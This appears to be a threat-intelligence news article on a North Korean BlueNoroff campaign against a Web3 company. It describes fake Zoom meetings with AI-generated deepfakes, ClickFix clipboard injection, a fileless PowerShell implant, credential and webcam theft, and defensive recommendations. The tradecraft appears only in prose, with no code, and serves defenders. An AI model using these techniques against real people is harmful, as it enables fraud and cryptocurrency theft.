BlueNoroff Used AI-Generated Zoom Deepfakes to Hide a 66-Day Fileless Implant in a Web3 Firm
BlueNoroff compromised a North American Web3 company using a fake Zoom meeting interface populated with AI-generated deepfakes, deploying a fileless PowerShell implant that maintained persistent access for 66 days while stealing cryptocurrency wallet credentials, browser data, and live webcam footage repurposed to lure future victims.
GLOBAL — Arctic Wolf Labs has published a detailed incident report attributing a sophisticated cryptocurrency theft campaign to BlueNoroff, a financially motivated subgroup of North Korea's Lazarus Group. The campaign — active across more than 20 countries and continuing as of April 2026 — combines spear-phishing via Calendly invites, typo-squatted Zoom and Microsoft Teams domains, AI-generated deepfake video interfaces built using OpenAI's GPT-4o model, ClickFix-style clipboard injection, and a fully fileless PowerShell attack chain that leaves no executable on disk. The primary victim documented by Arctic Wolf was a North American Web3 and cryptocurrency company whose systems were compromised for 66 consecutive days, beginning January 23, 2026.
| Campaign Overview: BlueNoroff Fake Zoom Operation | |
|---|---|
| Field | Details |
| Threat Actor | BlueNoroff / APT38 — financially motivated subgroup of North Korea's Lazarus Group (RGB) |
| Initial Access | Spear-phishing via Calendly invite; typo-squatted Zoom URL replaces legitimate Google Meet link |
| Lure Method | Fake Zoom interface with AI-generated deepfake participants (GPT-4o confirmed via C2PA metadata); live webcam exfiltration of victim |
| Payload Delivery | ClickFix-style clipboard injection — victim copies and runs malicious PowerShell command from fake Zoom SDK update prompt |
| Implant Type | Fully fileless PowerShell C2 implant — memory-resident only, no executable dropped to disk |
| Dwell Time | 66 days of persistent access on primary victim device |
| Geographic Reach | 20+ countries; United States = 41% of identified victims |
| Infrastructure | 80+ typo-squatted Zoom and Teams domains on Petrosky Cloud LLC (AS400897); 950+ media files on attacker server including stolen webcam footage and GPT-4o-generated headshots |
What Happened
The Social Engineering Chain
The attack begins months before the malware executes. BlueNoroff operators — working during Korean Standard Time business hours (08:00–18:00 KST, Monday to Friday) — identify targets in the Web3 and cryptocurrency sector and initiate contact through compromised Telegram accounts impersonating prior victims, or through direct outreach posing as legal or fintech industry figures. The attacker sends a Calendly invite for a professional "catch-up" meeting, which the target confirms. A legitimate Google Meet calendar invite is generated — which the attacker then covertly modifies, replacing the meeting URL with a typo-squatted Zoom domain designed to be visually indistinguishable from a genuine Zoom subdomain. The URL structure mirrors authentic Zoom join links, including meeting ID and password parameters. Arctic Wolf documented the primary victim clicking the malicious URL three times within four minutes — consistent with someone who believed their Zoom client was malfunctioning.
The Fake Meeting and Deepfake Pipeline
When the victim loads the fake URL, their browser renders a self-contained HTML page that recreates the Zoom meeting interface, including fake participant video tiles with looping footage, a cycling active speaker indicator, and — in more sophisticated iterations — AI-generated deepfake video of known industry figures. Arctic Wolf confirmed via C2PA cryptographic metadata that participant headshots on the attacker's server were generated using OpenAI's GPT-4o model. The campaign operates a self-reinforcing deepfake production pipeline: victim webcam footage is silently exfiltrated during the fake meeting, then reprocessed through Adobe Premiere Pro by the attacker to generate realistic lure content for future targets. Of 100 identified prior targets, 36 had real video recordings captured, 5 had static profile images, and 48 were archived for later use.
The ClickFix Payload and Fileless Implant
Once in the fake meeting, victims receive a prompt claiming the Zoom SDK requires updating. The prompt instructs them to copy a command and paste it into the Windows Run dialog or terminal — a ClickFix-style attack that bypasses traditional download-and-execute detection because no file touches disk. The pasted command downloads and executes an obfuscated secondary PowerShell script from a C2 server. This script establishes a persistent, AES-encrypted, memory-resident C2 implant that communicates via PowerShell and exfiltrates data through a Telegram Bot API screenshot mechanism. The full attack chain — from initial URL click to complete system compromise — completes in under five minutes. The implant then deploys post-exploitation modules targeting browser credentials, cryptocurrency wallet extensions, SSH keys, Telegram session tokens, and live screen capture. This campaign is distinct from BlueNoroff's earlier AppleScript and ClickFix campaign on macOS, which used different delivery infrastructure and targeted Mac-specific persistence mechanisms.
Scope and Impact
The campaign has spread across more than 20 countries, with the United States accounting for 41% of identified victims. Arctic Wolf's infrastructure analysis uncovered over 80 typo-squatted Zoom and Microsoft Teams domains registered between late 2025 and March 2026 on a single hosting provider, with new domains being added continuously. The volume of distinct payload delivery URLs observed on VirusTotal confirms this is a sustained, large-scale parallel operation — not isolated incidents.
Victim profiles skew heavily toward executive leadership. Nearly half of identified targets hold CEO or founder titles at cryptocurrency and Web3 organizations. This is consistent with BlueNoroff's broader financial theft mandate: executives control wallet access, signing authority, and institutional crypto holdings. The Security Alliance (SEAL) blocked 164 related UNC1069 domains between February 6 and April 7, 2026 — confirming significant parallel operational tempo. BlueNoroff is the same group behind the 2016 Bangladesh Bank SWIFT heist ($81M stolen), the 2022 Axie Infinity hack, and the February 2025 Bybit compromise. Understanding the full scope of social engineering tactics these groups deploy is critical for anyone operating in the Web3 space.
Response and Attribution
Arctic Wolf attributes this campaign to BlueNoroff with high confidence based on infrastructure overlaps with prior BlueNoroff fake conference campaigns documented by Kaspersky and Huntress, operator activity timing consistent with Korean Standard Time business hours, and tool consistency with known BlueNoroff TTPs. The campaign is separately corroborated by SEAL's domain blocking operation and the previously published North Korea npm malware campaign, which used overlapping infrastructure and targeting.
Defensive recommendations from Arctic Wolf include: enabling PowerShell Script Block Logging across all endpoints; restricting browser getUserMedia API access to trusted domains; training staff to verify any meeting request through a secondary communication channel before clicking links; and monitoring for clipboard abuse, unauthorized PowerShell activity, and unexpected access to browser credential stores. For a broader understanding of how deepfake technology works and how to detect it, see our full explainer.
The CyberSignal Analysis
Signal 01 — The Deepfake Production Pipeline Is the Most Alarming Development
The self-reinforcing nature of this campaign — where each victim's webcam footage becomes raw material for luring the next victim — represents a qualitative escalation in social engineering capability. BlueNoroff is not generating synthetic faces from scratch for every target. It is building a library of real, recognizable industry figures whose likeness has been compromised through prior attacks, then deploying those likenesses in precisely targeted fake meetings against people who actually know those individuals. This is not a scalable mass phishing campaign — it is precision social engineering at industrialized volume.
Signal 02 — Fileless Attacks Are Now the Default, Not the Exception
The 66-day dwell time on the primary victim device — achieved entirely through a memory-resident PowerShell implant with no executable on disk — reflects the maturity of fileless attack techniques among state-sponsored actors. Traditional endpoint detection that relies on file-based signatures or on-disk behavioral monitoring will not catch this implant. Detection requires PowerShell Script Block Logging, memory scanning, and network-level C2 traffic analysis. The ClickFix delivery method adds another layer: by making the victim execute the payload themselves via clipboard paste, the initial execution bypasses most download-and-execute detection logic.
Signal 03 — Calendly and Calendar Workflows Are an Undefended Attack Surface
The use of legitimate Calendly invites to establish initial trust — followed by covert link replacement in the resulting calendar event — exploits a workflow that most organizations treat as implicitly safe. Calendar invite links are rarely inspected with the same scrutiny as email attachments. Security awareness training that covers malicious attachments and phishing emails is not sufficient for this attack pattern. Organizations need explicit guidance for employees on verifying meeting links through secondary channels before clicking, particularly for meetings with external contacts in high-value sectors.
